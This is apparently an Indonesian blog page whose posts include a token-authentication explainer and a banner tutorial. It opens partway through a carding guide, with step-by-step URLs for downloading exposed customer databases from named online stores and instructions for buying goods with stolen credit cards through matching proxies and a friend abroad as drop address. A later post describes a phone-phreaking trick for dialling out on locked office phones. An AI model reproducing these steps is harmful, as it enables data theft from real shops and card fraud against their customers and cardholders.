xDatabase : shopping300
xDatabase :../../../../www/youngsliquors/5498761211

5. Skrg utk mendownload file shopping300 dapat dilakukan dgn merubah url/browsing nya menjadi :

http://www.youngsliquors.com/winestore/shopping300.mdb

6. Kalo sudah di download, buka file shopping300.mdb dgn Microsoft Access.

Metacart

Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :

1. http://www.imagexpres.com/metacart/moreinfo.asp

2. Kemudian hapus/delete moreinfo.asp di url/browsing sehingga menjadi http://www.imagexpres.com/metacart/

3. Masukkan file ini di belakang situs tadi :

database/metacart.mdb

Misal nya http://www.imagexpres.com/metacart/database/metacart.mdb

6. Kalo sudah di download, buka file metacart.mdb dgn Microsoft Access.

PDshopPro Shopping Cart

Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :

1. http://www.marktwainbooks.com/shop/category.asp?catid=4

2. Kemudian hapus/delete shop/category.asp?catid=4 di url/browsing sehingga menjadi http://www.marktwainbooks.com

3. Masukkan file ini di belakang situs tadi :

admin/dbsetup.asp

Misal nya http://www.marktwainbooks.com/admin/dbsetup.asp

4. Maka yang keluar di situs target adalah :

Your Database Type :
Microsoft Access
Your Connection String :
Driver={Microsoft Access Driver (*.mdb)}; DBQ=d:\inetpub\marktwainbooks\data\pdshoppro.mdb;
Current Status :
Connection to Database OK.
Database Primary ’setup’ Table Found!
Database permissions OK!

5. Skrg utk mendownload file pdshoppro.mdb dapat dilakukan dgn merubah url/browsing nya menjadi :

http://www.marktwainbooks.com/data/pdshoppro.mdb

6. Kalo sudah di download, buka file pdshoppro.mdb dgn Microsoft Access.

Cara Order Barang

Sebelum melakukan order barang, kamu musti mempunyai seorang teman di luar negeri (misalnya USA) karna kita akan menggunakan alamat teman kita.
Jgn harap bisa order ke Indonesia karna Indonesia termasuk dalam daftar “Black List Order”.
Apabila kamu order barang menggunakan CC (Credit Card) org/pemiliknya asal USA maka sebelum order barang, gunakan proxy USA.
Begitu pula sebaliknya jika CC org/pemiliknya asal Inggris maka gunakan proxy UK.

1. Order sebuah Laptop di sebuah situs, misal nya seperti di bawah ini. Lalu klik tab “Add to Cart”

2. Kemudian masukkan nomor CDW (liat kolom CDW) ke kolom “QuickCart”. Lalu klik tab “Continue to Checkout”

3. Karna kamu Costumer baru, klik tab “Create Account”

4. Isilah data-data teman kamu (data di bawah ini adalah palsu).

5. Isi lagi data-data teman kamu (data di bawah ini adalah palsu).

6. Pilih salah satu “Shipping Method” nya.

7. Masukkan data CC (Credit Card) yg kamu dapati dari situs atau teman.

8. Perhatikan “Shipping Adress” nya. Laptop yg kita beli akan di kirim ke alamat teman kita (data di bawah ini adalah palsu).

9. Perhatikan lagi “Shipping Adress” nya (data di bawah ini adalah palsu).

10. Skrg kamu tinggal menunggu kabar dari teman kamu yg di luar negeri (USA) via email/telepon.

Contoh hasil hasil Tracking Order:
Thank you for your order.
(Order Number: 20081221000XX) Payment is now complete.

Order Number: 20081221000XX
Total Price: $1153.00

Products will be sent as soon as dispatch preparations are complete.

We look forward to serving you again.

Read More

Memahami Cara Kerja Token Internet Banking

1:42 PM |


photo by:hendriadi.wordpress.com

Penggunaan token berupa alat kecil semacam kalkulator untuk mengamankan transaksi internet banking kini sudah menjadi hal yang wajib. Token ini menjadi faktor tambahan dalam otentikasi yaitu untuk membuktikan bahwa anda adalah benar-benar pengguna yang sah. Mungkin ada yang bertanya-tanya bagaimana cara kerja token seperti yang dipakai situs internet banking? Bagaimana alat kecil seperti kalkulator itu bisa menghasilkan angka yang juga diketahui oleh server internet banking, padahal alat itu tidak terbubung dengan server. Dalam artikel ini saya akan menjelaskan cara kerja token internet banking, dan dalam artikel berikutnya saya akan membuat token berbasis software dan website sederhana yang akan mensimulasikan internet banking.

Authentication Method

Otentikasi bertujuan untuk membuktikan siapa anda sebenarnya, apakah anda benar-benar orang yang anda klaim sebagai dia (who you claim to be). Ada banyak cara untuk membuktikan siapa anda. Metode otentikasi bisa dilihat dalam 3 kategori metode:

  1. Something You Know
  2. Ini adalah metode otentikasi yang paling umum. Cara ini mengandalkan kerahasiaan informasi, contohnya adalah password dan PIN. Cara ini berasumsi bahwa tidak ada seorangpun yang mengetahui rahasia itu kecuali anda seorang.

  3. Something You Have
  4. Cara ini biasanya merupakan faktor tambahan untuk membuat otentikasi menjadi lebih aman. Cara ini mengandalkan barang yang sifatnya unik contohnya adalah kartu magnetik/smartcard, hardware token, USB token dan sebagainya. Cara ini berasumsi bahwa tidak ada seorangpun yang memiliki barang tersebut kecuali anda seorang.

  5. Something You Are
  6. Ini adalah metode yang paling jarang diapakai karena faktor teknologi dan manusia juga. Cara ini mengandalkan keunikan bagian-bagian tubuh anda yang tidak mungkin ada pada orang lain seperti sidik jari, suara atau sidik retina. Cara ini berasumsi bahwa bagian tubuh anda seperti sidik jari dan sidik retina, tidak mungkin sama dengan orang lain.

Lalu bagaimana dengan metode otentikasi tradisional seperti tanda tangan di atas materai? Masuk ke kategori manakah cara itu dari ketiga metode di atas? Saya pikir tidak ada yang cocok, karena itu saya tambahkan satu lagi yaitu “Something You Can“. Cara ini berasumsi bahwa tidak ada orang lain di dunia ini yang bisa melakukan itu selain anda. Memang otentikasi dengan tanda tangan dibangun di atas asumsi itu, tidak ada yang bisa menuliskan tanda tangan anda kecuali anda. Walaupun pada kenyataannya ada saja orang yang bisa meniru tanda tangan anda dengan sangat baik, namun walaupun menyadari fakta tersebut tanda tangan di atas kertas tetap diakui sebagai bukti otentik atas siapa anda.

Two Factor Authentication

Pada aplikasi yang kritis dan sensitif seperti transaksi keuangan, satu metode otentikasi saja tidak cukup. Oleh karena itu muncul istilah 2FA (Two Factor Authentication) yang merupakan sistem otentikasi yang menggunakan 2 faktor (metode) yang berbeda. Empat metode otentikasi yang sudah saya jelaskan sebelunya dapat dikombinasikan untuk meningkatkan keamanan, salah satu contohnya adalah dengan kombinasi “something you have” berupa kartu ATM dengan “something you know” berupa PIN. Kombinasi ini merupakan kombinasi yang paling banyak dipakai.

Contoh kasus lain adalah ketika anda berbelanja di pasar modern dan membayar dengan kartu, tanpa disadari anda telah memakai lebih dari satu faktor otentikasi. Faktor yang pertama adalah “Something You Have” yaitu kartu debit/kredit anda. Faktor kedua adalah “Something You Know”, ketika anda diminta memasukkan PIN ke dalam mesin EDC. Bahkan mungkin ada faktor ketiga yaitu “Something You Can”, ketika anda diminta menanda-tangani nota pembayaran yang dicetak mesin EDC.

Internet banking juga menggunakan two factor authentication dengan mengombinasikan “something you know” berupa password dan “something you have” berupa hardware token (keyBCA atau Token Mandiri).

Password yang Dikeluarkan Token Internet Banking

Pada umumnya ada dua mode pemakaian token internet banking:

  1. Mode Challenge/Response (C/R)
  2. Ini adalah mode yang paling sering dipakai ketika bertransaksi. Dalam mode ini server memberikan challenge berupa sederetan angka. Angka tersebut harus dimasukkan kedalam mesin token untuk mendapatkan jawaban (response). Kemudian pengguna memasukkan angka yang muncul pada tokennya ke dalam form di situs internet banking. Token akan mengeluarkan kode yang berbeda-beda walaupun dengan challenge code yang sama secara periodik tergantung waktu ketika challenge dimasukkan ke dalam token.

  3. Mode Self Generated (Response Only)
  4. Dalam mode ini server tidak memberikan tantangan (challenge) apapun. Token pengguna bisa langsung mengeluarkan sederetan angka tanpa harus memasukkan challenge. Seperti mode C/R, token juga mengeluarkan kode yang berbeda-beda secara periodik tergantung waktu ketika token diminta untuk menghasilkan kode self generated.

Sebenarnya jawaban yang diberikan oleh token baik dalam mode C/R maupun Self Generated(resopnse only) tidak lain adalah password juga. Namun berbeda dengan password yang anda pakai untuk login, password yang dihasilkan token ini memiliki keterbatasan untuk alasan keamanan, yaitu:

  1. Hanya boleh dipakai 1 kali
  2. Ini disebut dengan OTP (One Time Password). Setelah suatu password dipakai, maka password yang sama tidak bisa lagi dipakai untuk kedua kalinya. Dengan cara ini tidak ada gunanya menyadap password yang dihasilkan token karena password tersebut tidak bisa dipakai lagi. Namun bila password tersebut di-intercept sehingga tidak pernah sampai ke server, maka password tersebut masih berharga karena di mata server, password itu belum pernah dipakai.

  3. Hanya boleh dipakai dalam rentang waktu yang terbatas
  4. Password yang dihasilkan token memiliki umur yang sangat terbatas, mungkin antara 3-6 menit bila umurnya habis maka password itu tidak bisa dipakai, walaupun belum pernah dipakai. Nanti akan saya jelaskan mengapa password token memerlukan umur, waktu merupakan unsur yang sangat kritikal dalam sistem ini.

  5. Hanya boleh dipakai dalam konteks sempit
  6. Bila password/PIN yang dipakai untuk login adalah password yang bebas konteks, dalam arti dengan berbekal password itu, anda bisa melakukan banyak hal, mulai dari melihat saldo, mengecek transaksi dan sebagainya. Namun password yang dihasilkan token, hanya bisa dipakai dalam konteks sempit, contohnya password yang dipakai untuk mengisi pulsa ke nomor 08123456789, tidak bisa dipakai untuk melakukan transfer dana.

    Terbatasnya konteks ini disebabkan karena untuk melakukan transaksi dibutuhkan password yang diikat oleh challenge dari server, sehingga password tersebut tidak bisa dipakai untuk transaksi lain yang membutuhkan challenge code yang berbeda. Contohnya bila challenge yang diberikan server adalah 3 digit terakhir dari nomor handphone (untuk transaksi isi pulsa), atau 3 digit terakhir nomor rekening tujuan (untuk transaksi transfer). Maka password yang dihasilkan token untuk transaksi isi pulsa ke nomor 0812555111222, akan valid juga untuk transaksi transfer uang ke rekening 155887723120222. Sebab kebetulan kedua transaksi tersebut membutuhkan password yang diikat oleh challenge code yang sama, yaitu 222 (diambil dari 3 digit terakhir).

    Konteks ini hanya berlaku bila password dihasilkan dalam mode C/R. Password yang dihasilkan dalam mode Self Generated, bisa dipakai dalam transaksi apa saja yang tidak meminta password dengan challenge code.

Jadi bisa disimpulkan bahwa password yang dikeluarkan token bersifat:

  1. Selalu berubah-ubah secara periodik
  2. Memiliki umur yang singkat
  3. Hanya bisa dipakai 1 kali
  4. Terbagi dalam ada dua jenis, yaitu:
  • Password kontekstual yang terikat oleh challenge code dalam mode challenge/response.
  • Password bebas konteks yang dihasilkan dalam mode self generated.

Proses Otentikasi

Seperti password pada umumnya, syarat agar otentikasi berhasil adalah:

password yang dikirimkan client = password yang disimpan di server

Dengan alasan keamanan jarang sekali server menyimpan password user dalam bentuk plain-text. Biasanya server menyimpan password user dalam bentuk hash sehingga tidak bisa dikembalikan dalam bentuk plain-text. Jadi syarat otentikasi berhasil di atas bisa diartikan sebagai hasil penghitungan hash dari password yang dikirim klien harus sama dengan nilai hash yang disimpan dalam server. Perhatikan gambar di bawah ini untuk lebih memahami.

courtesy of  "www.unixwiz.net/techtips/iguide-crypto-hashes.html"

courtesy of "www.unixwiz.net/techtips/iguide-crypto-hashes.html"

Penggunaan Salt

Untuk menghindari brute-force attack terhadap hash yang disimpan di server, maka sebelum password user dihitung nilai hashnya, terlebih dahulu ditambahkan string acak yang disebut dengan salt. Perhatikan contoh berikut, bila password user adalah “secret”, maka sebelum dihitung nilai hashnya, password ditambahkan dulu salt berupa string acak “81090273″ sehingga yang dihitung nilai hashnya adalah “secret81090273″ bukan “secret”.

Perhatikan bahwa nilai MD5(“secret81090273″) adalah 894240dbe3d2b546c05a1a8e9e0df1bc sedangkan nilai MD5(“secret”) adalah 5ebe2294ecd0e0f08eab7690d2a6ee69. Bila tanpa menggunakan salt, maka attacker yang mendapatkan nilai hash 5ebe2294ecd0e0f08eab7690d2a6ee69 bisa menggunakan teknik brute force attack atau rainbow table untuk mendapatkan nilai password dalam plain-text. Salah satu contoh database MD5 online yang bisa dipakai untuk crack md5 adalah http://gdataonline.com/seekhash.php . Dalam situs tersebut coba masukkan nilai 5ebe2294ecd0e0f08eab7690d2a6ee69, maka situs tersebut akan memberikan hasil “secret”. Hal ini disebabkan karena situs tersebut telah menyimpan pemetaan informasi secret<=>5ebe2294ecd0e0f08eab7690d2a6ee69.

Penambahan salt “81090273″ membuat nilai hash menjadi 894240dbe3d2b546c05a1a8e9e0df1bc. Bila nilai ini dimasukkan dalam situs tersebut, dijamin tidak akan ada dalam databasenya bahwa nilai hash tersebut adalah “secret81090273″. Dan karena nilai salt ini dibangkitkan secara random, maka tiap user memiliki nilai salt yang berbeda sehingga tidak mungkin attacker bisa membangun database pemetaan antara plaintext dan hash secara lengkap.

Dengan penggunaan salt, maka database pengguna dalam server akan tampak seperti ini:

Username Salt Password Hash
budi 81090273 894240dbe3d2b546c05a1a8e9e0df1bc

Field salt diperlukan ketika melakukan otentikasi. Password yang dikirimkan user akan ditambahkan dulu dengan nilai salt ini baru kemudian dihitung nilai hashnya. Nilai hash hasil perhitungan tersebut akan dibandingkan dengan field Password Hash yang ada di kolom sebelahnya. Bila sama, maka otentikasi berhasil, bila tidak sama, berarti otentikasi gagal. Secara prinsip sama saja dengan gambar di atas, hanya ditambahkan satu langkah yaitu penambahan salt sebelum dihitung nilai hashnya.

Pembangkitan One Time Password (OTP) Token Internet Banking

Apa yang saya jelaskan sebelumnya menjadi dasar dari apa yang akan saya jelaskan berikut ini. Bagaimana cara token menghasilkan sederetan angka sebagai OTP yang bisa diotentikasi oleh server? Ingat bahwa syarat agar otentikasi berhasil adalah password yang dikirim klien harus sama dengan yang disimpan di server. Ingat juga bahwa password yang dihasilkan token selalu berubah-ubah secara periodik. Bagaimana apa yang dihasilkan alat itu bisa sinkron dengan server? Padahal alat tersebut tidak terhubung dengan server, bagaimana server bisa tahu berapa nilai yang dihasilkan token? Jawabannya adalah dengan waktu. Sebelumnya sudah saya sebutkan bahwa waktu adalah elemen yang sangat penting dalam sistem ini. Server dan token dapat sinkron dengan menggunakan waktu sebagai nilai acuan.

OTP dalam Mode Self Generated (Response Only)

Saya akan jelaskan mulai dari pembangkitan OTP dalam mode self generated atau response only. Sebelumnya tentu saja, server dan token harus menyepakati sebuah nilai awal rahasia (init-secret). Nilai awal ini disimpan (ditanam) dalam token dan disimpan juga dalam tabel di server.

Ketika pada suatu waktu tertentu token diminta menghasilkan OTP tanpa challenge code, inilah yang dilakukan token:

  1. Mengambil waktu saat ini dalam detik berformat EPOCH (jumlah detik sejak 1 Januari 1970), biasanya dalam granularity 10 detik, sehingga nilai EPOCH dibagi 10.
  2. Menggabungkan init-secret dengan waktu saat ini dari langkah 1.
  3. Menghitung nilai hash gabungan init-secret dan waktu dari langkah 2.

Nilai hash dari langkah 3 inilah yang menjadi OTP. Namun biasanya OTP diambil dari beberapa karakter/digit di awal hash.

Bagaimana cara server melakukan otentikasi? Caranya mirip dengan yang dilakukan token, yaitu dengan menghitung nilai hash gabungan init-secret dengan waktu saat ini dan mengambil beberapa digit di awal sebagai OTP. Bila OTP yang dikirim user sama dengan OTP yang didapatkan server dari perhitungan hash, maka otentikasi berhasil.

Namun ada sedikit catatan yang harus diperhatikan terkait waktu. Untuk memberikan toleransi perbedaan waktu antara token dan server, dan juga jeda waktu dari sejak server meminta password sampai user meminta token membangkitkan token, maka server harus memberikan toleransi waktu.

Ada tiga kejadian yang perlu diperhatikan waktunya, yaitu:

  1. Detik ketika server meminta password (OTP) dari user
  2. Detik ketika token membangkitkan OTP
  3. Detik ketika server menerima OTP dari user

Perhatikan contoh di bawah ini:

Bila diasumsikan waktu di server sama persis dengan waktu di token (jam internal token), maka kita harus perhatikan bahwa pasti akan ada jeda antara kejadian 1, 2 dan 3. Bila pada detik ke-0 server meminta password dari user, karena lambatnya akses internet, bisa jadi baru pada detik ke-30 user melihat pada browsernya bahwa dia harus memasukkan OTP dari token. Kemudian baru pada detik ke-60 token menghasilkan OTP. Pada detik ke-65 user mensubmit nilai OTP tersebut ke server dan baru tiba di server pada detik ke-90.

Karena pembangkitan OTP tergantung waktu pada saat OTP dibangkitkan, maka OTP yang dihasilkan token, adalah OTP pada detik ke-60. Sedangkan server meminta password dari user sejak detik ke-0. Bagaimana cara server melakukan otentikasi? Caranya adalah dengan memeriksa seluruh kemungkinan OTP dalam rentang waktu yang dipandang memadai, misalkan 180 detik.

Bila sistem menggunakan granularity 10 detik maka server harus menghitung nilai OTP sejak dari detik ke-0, 10, 20, 30, 40, s/d ke 180 dalam kelipatan 10 detik. Perhatikan contoh pada gambar di bawah ini. Dalam sistem ini diasumsikan OTP adalah 6 karakter awal dari MD5 gabungan. Dalam melakukan otentikasi, server harus membandingkan semua nilai OTP sejak detik ke-0 (dalam contoh ini EPOCH/10 = 124868042) hingga waktu toleransi maksimum.

otptoken1Dalam contoh di atas bila user mengirimkan OTP “b1cdb9″ maka otentikasi akan berhasil ketika server menghitung nilai OTP pada detik ke-60 sejak server meminta OTP dari user.

Ilustrasi di atas hanyalah contoh, pada kenyataannya ada kemungkinan waktu antara server dan token tidak sama persis 100%, sehingga server terpaksa harus memberikan toleransi waktu tidak hanya ke depan, namun juga ke belakang. Sebab bisa jadi waktu di server lebih cepat daripada waktu di token. Sebagai contoh ketika waktu di server menunjukkan EPOCH/10=124868219, bisa jadi waktu di token baru menunjukkan EPOCH/10=1248682121 (waktu token terlambat 80 detik).

Misalkan waktu toleransi adalah 3 menit, maka server harus memberikan toleransi 3 menit ke depan dan 3 menit ke belakang relatif terhadap waktu ketika server menerima OTP dari user dan melakukan otentikasi. Ingat, waktu toleransi ini relatif terhadap waktu server melakukan otentikasi. Jadi jika server melakukan otentikasi pada EPOCH/10=600, maka server harus menghitung seluruh nilai OTP sejak EPOCH/10=420 hingga EPOCH/10=780.

Ingat penjelasan saya tentang salt sebelumnya. Kalau dibandingkan dengan OTP ini, maka nilai init-secret adalah sejenis dengan password plain-text pengguna, sedangkan salt atau tambahannya adalah waktu (EPOCH/10).

Umur OTP

Sebelumnya sudah saya sebutkan bahwa sifat dari OTP adalah memiliki umur yang terbatas. Umur ini terkait dengan waktu toleransi yang diberikan server sebesar X detik ke depan dan X detik ke belakang relatif terhadap saat server melakukan otentikasi. Bila waktu toleransi adalah 3 menit (180 detik), maka umur sebuah OTP adalah 3 menit, dalam arti bila server melakukan otentikasi tidak lebih dari 3 menit sejak OTP dibangkitkan token, maka OTP tersebut akan dianggap valid oleh server.

OTP dalam Mode Challenge/Response

Pembangkitan dan otentikasi OTP dalam mode C/R sebenarnya mirip dengan mode self-generated. Bila dalam mode self generated tambahan (salt) dari init-secret adalah waktu (EPOCH/10), dalam mode C/R ini salt/tambahannya lebih banyak. Init-secret tidak hanya ditambah dengan waktu, namun juga ditambah lagi dengan challenge.

Perhatikan gambar di bawah ini. Server melakukan penghitungan OTP untuk semua detik dalam waktu toleransinya.

otptoken2

Dalam mode C/R ada field tambahan yang harus digabungkan sebelum dihitung nilai hashnya, yaitu challenge. Nilai challenge ini diketahui oleh server dan juga oleh token (ketika user mengetikkan challenge ke token), sehingga baik token maupun server akan dapat menghitung OTP yang sama sehingga proses otentikasi dapat berlangsung.

Read More

Cara Hacker curi data Kartu Kredit

6:50 PM |


Artikel ini tidak ditujukan untuk mengajari anda gimana mencuri data kartu kredit, tapi kami ingin memberitahu anda supaya di kemudian hari anda bisa terhindari dari kejahatan pencurian data kartu kredit. Istilah kejahatan kartu kredit yang biasa di istilahkan "carding" sejak adanya internet meningkat ratusan persen. Ironisnya Indonesia masuk dalam jajaran top 10 (sempat di peringkat pertama) sehingga kartu kredit terbitan Bank-Bank Indonesia ditolak ketika belanja online di situs luar negeri.
Hal ini juga pernah di alami oleh penulis yang ingin berlangganan majalah game luar negeri dengan pembayaran online lewat kartu kredit.

Para hacker sangat suka sekali kejahatan yang satu ini, kenapa? Karena kalau cuma nge-hack website atau deface (merubah tampilan/link website) merupakan sesuatu yang tidak ada untungnya. Dan hal ini bisa ke deteksi dan pelaku kejahatan bisa ketangkap dengan mudah kalau sites yang dia masuki memiliki TRACKER (program pelacak ip/link) atau LOG FILE (file yang mencatat aktivitas user/ip yang masuk ke website). Kalau carding mereka bisa bebas tanpa jejak dan juga kadang-kadang setelah mendapatkan datanya, mereka sebarkan antar hacker sehingga susah dilacak orang pertama yang mencuri data kartu kredit. Kejadian baru-baru ini yaitu situs internet teroris Indonesia juga di register dari hasil carding.

Ada beberapa cara yang digunakan oleh hacker dalam mencuri kartu kredit, antara lain:
1. Paket sniffer, cara ini adalah cara yang paling cepat untuk mendapatkan data apa saja. Konsep kerjanya mereka cukup memakai program yang dapat melihat atau membuat logging file dari data yang dikirim oleh website e-commerce (penjualan online) yang mereka incar. Pada umumnya mereka mengincar website yang tidak dilengkapi security encryption atau situs yang tidak memiliki security yang bagus.

2. Membuat program spyware, trojan, worm dan sejenisnya yang berfungsi seperti keylogger (keyboard logger, program mencatat aktifitas keyboard) dan program ini disebar lewat E-mail Spamming (taruh file-nya di attachment), mirc (chatting), messenger (yahoo, MSN), atau situs-situs tertentu dengan icon atau iming-iming yang menarik netter untuk mendownload dan membuka file tersebut. Program ini akan mencatat semua aktivitas komputer anda ke dalam sebuah file, dan akan mengirimnya ke email hacker. Kadang-kadang program ini dapat dijalankan langsung kalau anda masuk ke situs yang di buat hacker atau situs porno.

3. Membuat situs phising, yaitu situs sejenis atau kelihatan sama seperti situs aslinya. contoh di Indonesia ketika itu situs klik bca (www.klikbca.com), pernah mengalami hal yang sama. situs tersebut tampilannya sama seperti klikbca tetapi alamatnya dibikin beberapa yang berbeda seperti www.clikbca.com, www.kikbca.com, dll, jadi kalau netter yang salah ketik, akan nyasar ke situs tersebut. Untungnya orang yang membuat situs tersebut katanya tidak bermaksud jahat. Nah kalau hacker carding yang buat tuh situs, siap-siap deh kartu kredit anda bakal jebol.

4. Menjebol situs e-commerce itu langsung dan mencuri semua data para pelanggannya. Cara ini agak sulit dan perlu pakar hacker atau hacker yang sudah pengalaman untuk melakukannya. Pada umumnya mereka memakai metode injection (memasukan script yang dapat dijalankan oleh situs/server) bagi situs yang memiliki firewall. Ada beberapa cara injection antara lain yang umum digunakan html injection dan SQL injection. Bagi situs yang tidak memiliki security atau firewall, siap-siaplah dikerjain abis-abisan.

Ada beberapa cara lagi yang dilakukan para hacker, tapi cara-cara di atas adalah cara yang paling umum dilakukan hacker untuk carding. Cara yang tidak umum akan dijelaskan nanti di lain waktu. Kejahatan tidak hanya terjadi karena ada niat dari si pelaku, tetapi karena adanya kesempatan, waspadalah... waspadalah...

Read More

Phone Phreaking

6:46 PM |

Kali ini saya ingin sedikit berbagi pengalaman mengenai phone phreaking. Trik ini buat mengakali Telephone paralel yang sering digunakan di kantor-kantor. Trik ini sudah sering saya terapkan dahulu saat kerja di sebuah lembaga pendidikan. Ketatnya pengawasan penggunaan Telephone untuk pegawai membuat saya sedikit gerah, biasanya telephon satu jalur (hanya bisa menerima) di pasang untuk menghindari penggunaan telephone untuk kepentingan pribadi. Bahkan saking protektifnya, Telephone bahkan dikunci.

Teknik ini menggunakan tut pada bagian ganggang atas telephon yang digunakan untuk memutus hubungan komunikasi. Untuk menghubungi nomor tertentu cukup menekan tut tersebut dengan kombinasi tertentu.

0 = 10 kali ketukan
1 = 1 kali ketukan
2 = 2 kali ketukan
3 = 3 kali ketukan
dst…
9 = 9 kali ketukan

Pengetukan dilakukan dengan jarak yang cepat, kemudian jarak antar angka kira-kira 2-3 detik.

Contoh: 21045

2 kali ketukan (jeda 2 detik) – 1 kali ketukan (jeda 2 detik) – 10 ketukan (jeda 2 detik) – 4 ketukan (jeda 2 detik) – 5 ketukan.

Oke semoga berguna…….

Read More

Cara membuat banner

6:43 PM |

agi yg bisa program photoshop, membuat banner dan badge/chicklet itu mudah. Bagi yg agak males latihan otak-atik photoshop seperti saya tidak usah kuatir. Di internet banyak penyedia program pembuat chicklet dan banner online secara gratis dan instan. Sebagai pembuka, logo atau chicklet adalah banner kecil yg biasa buat link-button seperti yg di sidebar blog saya. Sementara banner ukurannya lebih besar dan biasa ditaruh di header blog/website. Ikuti panduan buat logo/chicklet/banner berikut:

A. Cara Membuat Chicklet
1. Kunjungi http://button.blogflux.com/
2. Di LEFT-BLOCK (bagian kiri atas) ada menu “Text”, ganti tulisan “w3c” sesuai dg yg Anda inginkan. Contoh, tulis Blog;
3. Di RIGHT-BLOCK (bagian kanan atas) ada menu “Text”, ganti tulisan “xhtml” dg yg sesuai dg keinginan Anda, contoh, “Tutorial”
4. Di GENERATE-BUTTON (bagian kanan bawah) klik tulisan Generate Button. Maka akan muncul chicklet seperti ini:
5. Nah, arahkan mouse ke gambar, klik kanan –> save picture as –> kasih nama file (contoh: blog-tutorial –> save di komputer Anda.
6. Setelah di saving di komputer, masukkan / upload gambar chicklet tsb di situs online seperti googlepages.com. Dalam kasus ini, gambar disimpan di http://fatihsyuhud.googlepages.com/ jadi alamat chicklet gambar tsb. adalah http://fatihsyuhud.googlepages.com/ blog-tutorial.gif
Note: Apabila belum daftar di googlepages.com, Anda tinggal kunjungi alamat URL googlepages.com and login dengan account gmail Anda.
7. Setelah tersimpan secara online, Anda bisa gunakan sesuai kebutuhan Anda seperti untuk linkbutton tukar link dg teman-teman blogger lain, atau sekedar buat pajangan di sidebar.
Tip: bentuk font dan background warna dapat dirubah sesuai selera. Tinggal klik menu “color” dan “background” di situs di atas.
B. Cara Buat Banner Online
1. Kunjungi situs http://cooltext.com/
2. Klik menu DESIGN A LOGO (bagian atas).
3. Di menu CHOOSE A LOGO DESIGN pilih gambar yg Anda suka, contoh, klik EMBOSSED.
4. Di menu LOGO TEXT saya tulis “Blog Tutorial”
5. Klik menu RENDER LOGO DESIGN (bagian paling bawah).
6. Save ke komputer (caranya, klik kanan gambar tersebut –>save picture as –>kasih nama file )
7. Setelah itu upload ke googlepages.com milik Anda. (lihat poin A.5 dan A.6).
Catatan: Mengupload image / gambar logo atau banner tentu saja tidak harus di googlepages.com, bagi pengguna wordpress.com Anda bisa juga menguploadnya di wordpress.com, di blogger.com bagi pengguna blogspot, atau di mana saja hosting online gratis.
Salam ngeblog.
Read More